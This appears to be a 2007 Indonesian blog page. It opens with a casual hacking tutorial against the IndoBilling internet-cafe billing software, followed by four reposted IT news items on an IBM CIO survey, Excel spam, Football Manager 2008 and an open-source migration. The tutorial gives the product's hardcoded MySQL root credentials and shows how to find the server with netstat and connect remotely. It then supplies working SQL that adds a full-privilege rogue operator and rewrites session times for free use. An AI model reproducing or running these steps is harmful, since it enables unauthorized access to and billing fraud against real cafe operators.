Security Vulnerability Pada IndoBilling

31 Juli, 2007 at 12:11 pm | In hACkiNg | 1 Comment

[x] Apa itu indobilling ?? yaahhh… semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.
Ngerti bahasne po ora dab ???? pokok e kaya gt lah …
[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.
[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya … d0s4 !! kan rejekinya udh ada
sendiri-sendiri)
[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.
[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.
[x] IP nya tau dr mn ??
ya liat aja pake netstat.
[x] Oww … gt ya … menarik jg nih. Jelasin dong !!!

kay …. pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file “netstat.bat” yang isinya berikut ini

============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari “netstat” ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini <a href=”http://www.webyog.com/downloads/SQLyog604.exe”>Download SQLyog</a>.

/*mlm ni masih lumayan ad temennya, nge-blog bareng ‘eross fyuuhhh … tetep ngantuk jg.
(cukup ….kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !!! )*/

kemaren udh sampe di bahasan “mengetahui IP Billing Server”, sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah “password & username” nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================

[x]nah lo … tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh… sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya …

hmmm…. udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table “warnet”.
misalnya kita pengen nambahin operator di billing server dengan username “cracker” dan password “cracker” yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,’cracker’,password(‘cracker’),’intruder’,'true’,'true’,'true’,'true’,'true’,'true’,'true’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’,'Y’)
============================================= [don't copy paste this line]

nahhh …. gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = ‘yyyy-mm-dd hh:mm:ss’
-> format st_name = ‘nama username’
-> st_id = ‘nomor KBU’
yang perlu diinget adalah nilai “st_start” harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]
update station set st_start=’2007-07-01 20:30:30′,st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),’ ‘,curtime()),st_name=’invisible_theater’, st_duration=’00:01:00′ where st_id=’1′
============================================= [don't copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm…. boleh-boleh ………. trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh … silakan di uprek sendiri dengan kreatifitas sendiri ya …

Peranan TI Dalam Bisnis Perlu Disejajarkan

30 Juli, 2007 at 4:11 pm | In Berita IT harian | Leave a Comment

Senin , 30/07/2007 14:47 WIB

Peranan TI Dalam Bisnis Perlu Disejajarkan

 


Jakarta, Mayoritas Chief Information Officer (CIO) percaya bahwa teknologi informasi (TI) secara signifikan akan mengubah industri. Namun demikian, masih sedikit perusahaan yang sudah sepenuhnya memanfaatkan potensi itu.

Presiden Direktur IBM Indonesia Betti Alisjahbana mengatakan, para CIO menganut model baru di mana TI menjadi pemberdaya dan katalis inovasi.

“Tujuannya, untuk menentukan arah bisnis strategis dan menawarkan ide-ide baru serta menyejajarkan TI sedemikian rupa sehingga memberikan manfaat bisnis,” ujarnya dalam keterangan tertulis yang diterima detikINET, Senin (30/7/2007.)

Agar para CIO meraih sukses, pengintegrasian bisnis dan teknologi yang konsisten penting untuk inovasi, Betti menambahkan.

Ia juga menyebutkan, investasi TI pada suatu perusahaan kini dinilai berdasarkan apa yang dapat dihasilkannya dari investasi tersebut melalui produktivitas yang lebih tinggi atau keunggulan kompetitif.

“Semakin banyak CEO yang mengubah model bisnis mereka untuk memasukkan CIO ke dalam persamaan. Keberhasilan upaya inovasi suatu organisasi bergantung pada penyejajaran TI dan bisnis,” tegas Betti.

IBM baru-baru ini mengadakan survei global yang melibatkan lebih dari 170 CIO perusahaan-perusahaan terkemuka di dunia. Perusahaan yang sudah malang melintang di dunia TI itu percaya, peran CIO telah berubah dari sekedar pendukung teknologi dan komputasi menjadi pencipta strategi dan transformasi bisnis.

Lewat ajang bertajuk IBM CIO Leadership Forum Survey tersebut, sekitar 84 persen CIO percaya bahwa TI secara signifikan akan mengubah industri. Namun demikian, hanya 16 persen dari CIO yang mengakui bahwa perusahaan mereka sudah sepenuhnya memanfaatkan potensi TI.

Sementara, dari hasil riset komprehensif terhadap 750 Chief Executive Officers (CEO) dalam ajang IBM Global CEO Study, hampir 80 persen di antaranya memandang pengintegrasian bisnis dan teknologi sebagai hal yang sangat penting. Namun, hanya 45 persen dari para CEO yang sudah mengintegrasikan kedua unsur tersebut secara luas di dalam perusahaan mereka.

Menariknya, para CEO yang telah mengintegrasikan TI tersebut mengklaim telah mengalami peningkatan pendapatan tiga kali lipat lebih sering dari perusahaan-perusahaan yang kurang terintegrasi. Kelompok CEO ini juga mengaku dapat meraih peningkatan pendapatan lima persen lebih cepat dari pesaing-pesaingnya.

Spam Mulai Menyusup di Dokumen Excel

30 Juli, 2007 at 2:26 pm | In Berita IT harian | Leave a Comment

Senin , 30/07/2007 14:02 WIB

Spam Mulai Menyusup di Dokumen Excel

 

Jakarta, Ada-ada saja cara spammer untuk menarik perhatian korbannya. Setelah masuk lewat teks, HTML, gambar, dan PDF, kini spam pun menyusup lewat dokumen Excel.

Perkembangan spam tersebut diperhatikan oleh Mikko Hypponen, Chief Research Officer perusahaan antivirus F-Secure. Problema e-mail sampah yang dikirim dengan membabibuta alias spam itu memang telah menjadi salah satu masalah yang mengkhawatirkan praktisi keamanan komputer.

Mikko, seperti dikutip detikINET dari F-Secure.com, Senin (30/7/2007), mengatakan pengirim spam telah melakukan berbagai cara untuk menyusupkan pesan mereka agar dibaca oleh korbannya. “Pertama spam hanya teks, filter spam pun memblokirnya. Lalu mereka menggunakan html, itu pun diblokir. Lalu mereka memakai gambar, itu juga diblokir. Kemudian memakai lampiran file PDF, itu juga sedang diupayakan untuk diblokir. Kini mereka menggunakan file Office,” ujar Mikko.

Spam dalam file Microsoft Excel (.xls) itu diamati Mikko dalam e-mail tanpa judul dan tanpa isi yang mengandung lampiran berkas terkompresi (.zip). “File ZIP itu mengandung satu file spreadsheet Excel. Jika dibuka lewat Microsoft Excel, isinya hanya sebuah spam yang mengiklankan saham,” tutur Mikko.

Mikko memperingatkan pengguna internet untuk waspada terhadap spam jenis ini. Apalagi, tukasnya, file XLS bisa saja disusupi oleh program jahat seperti virus, trojan, atau spyware.

Di masa depan, Mikko melihat, ada kemungkinan spam akan memanfaatkan file musik (mp3). “File MP3 yang ternyata iklan dalam bentuk suara? Saya belum lihat tapi saya yakin sudah ada yang mencobanya,” ia menandaskan.

Football Manager 2008 Hadir Sebelum Akhir Tahun

30 Juli, 2007 at 2:23 pm | In Berita IT harian | Leave a Comment

Senin , 30/07/2007 13:39 WIB

Football Manager 2008 Hadir Sebelum Akhir Tahun

 

Jakarta, Versi terbaru game strategi sepakbola populer yang dikembangkan Sports Interactive, Football Manager (FM) 2008 untuk komputer dan Apple Macintosh, rencananya akan diluncurkan sebelum Natal 2007 mendatang.

“Dengan lusinan fitur baru, kami menunggu bagaimana reaksi para penggemar yang akan memainkannya nanti,” ungkap Miles Jacobson, Studio Director dari Sports Interactive.

Seperti dikutip detikINET dari Softpedia, Senin (31/7/2007), fitur-fitur baru untuk Football Manager 2008 ini di antaranya:

Alur Pertandingan — Alur pertandingan menghadirkan atmosfer baru seperti jalannya pertandingan tak akan terhenti meskipun kita membuat perubahan taktik. Sebuah radar mungil akan muncul agar kita tetap mengetahui jalannya pertandingan jika bermaksud mengubah taktik.

Manajemen Sepakbola InternasionalGameplay untuk manajemen sepakbola internasional berubah total seperti adanya pensiun pemain dari tim nasional, interaksi antar pemain, seleksi kapten tim dan moral pemain di timnas dan klub tidak bercampur aduk.

Kepercayaan (Confidence) — Para pemain kini bisa dengan mudah berbicara untuk menanggapi pertanyaan suporter atau para petinggi klub tentang performa permainan ataupun manajemen keuangan mereka.

Pusat Transfer (Transfer Centre) — Fitur yang menyajikan cara baru dalam mengatur seluruh transfer yang sedang berlangsung dan tawaran gaji. Hal ini memudahkan untuk membandingkan semua tawaran transfer pemain sebagai pertimbangan untuk menolak atau menerimanya.

Perkembangan Mesin Game — Mesin game dikembangkan secara drastis termasuk kemampuan mengetahui karakter seorang pemain sebelum musim dimulai agar performanya dikembangkan secara tepat.

Perkembangan Penghargaan — Sistem penghargaan atau pemberian piala lebih akurat. Juga ditambahkan penghargaan baru seperti sepatu emas Eropa dan fitur ‘best eleven’ yang mencantumkan para pemain terbaik sepanjang masa baik dari tim nasional maupun klub.

Hari Suporter (Fan Days) — Pemimpin klub bisa menyusun sebuah hari untuk para fans demi meningkatkan jumlah penonton dengan efek jangka panjang.

Pengembangan Fitur Media — Lebih banyak laporan berita dari media massa termasuk laporan hangat tentang apa yang sedang terjadi pada musim kompetisi.

Perkembangan Foto Pemain — Foto para pemain dari masa muda sampai dewasa bisa berubah sesuai perkembangan waktu dalam game.

Dua Propinsi Siap Migrasi ke Open Source

30 Juli, 2007 at 2:17 pm | In Berita IT harian | Leave a Comment

Senin , 30/07/2007 13:00 WIB

Dua Propinsi Siap Migrasi ke Open Source

 

Jakarta, Dua propinsi di Indonesia yakni Nanggroe Aceh Darussalam (NAD) dan Daerah Istimewa Yogyakarta (DIY) akan memigrasikan komputer-komputernya ke software Open Source.

Proses migrasi ini akan ditangani oleh Yayasan AirPutih bekerja sama dengan Yayasan Pengiat Linux Indonesia, Komunitas Pengguna Linux Indonesia, Rimba Linux, Universitas Gunadarma dan Combine. Serta juga didukung oleh Hivos dan Kementrian Riset dan Teknologi.

Dari keterangan tertulis yang dikutip detikINET, Senin (30/7/2007), pemilihan dua propinsi ini disebabkan karena mereka secara resmi telah menyatakan kesediaannya terlibat dalam proses penggunaan Open Source ke Yayasan AirPutih. Sementara propinsi lainnya sedang dalam proses pendekatan.

Sehingga diharapkan melalui dua propinsi tersebut, penggunaan software Open Source juga dapat meluas ke propinsi-propinsi lainnya di wilayah Indonesia.

Sebagai bonus, Yayasan AirPutih bersama para partner akan memigrasikan 1 Usaha Kecil dan Menengah (UKM), 1 Non Goverment Organization (NGO), 1 lembaga pendidikan dan 1 dinas pemerintah ke Open Source secara menyeluruh.

Program ini sendiri akan dimulai pada awal Agustus 2007 dan diakhiri dengan membentuk sebuah help desk Open Source nasional. Help desk ini akan dikelola oleh komunitas pengguna linux setempat dan di tingkat nasional akan dikelola bersama komunitas Open Source.

Halaman Berikutnya »

Blog pada WordPress.com. | Theme: Pool by Borja Fernandez.
Entries and comments feeds.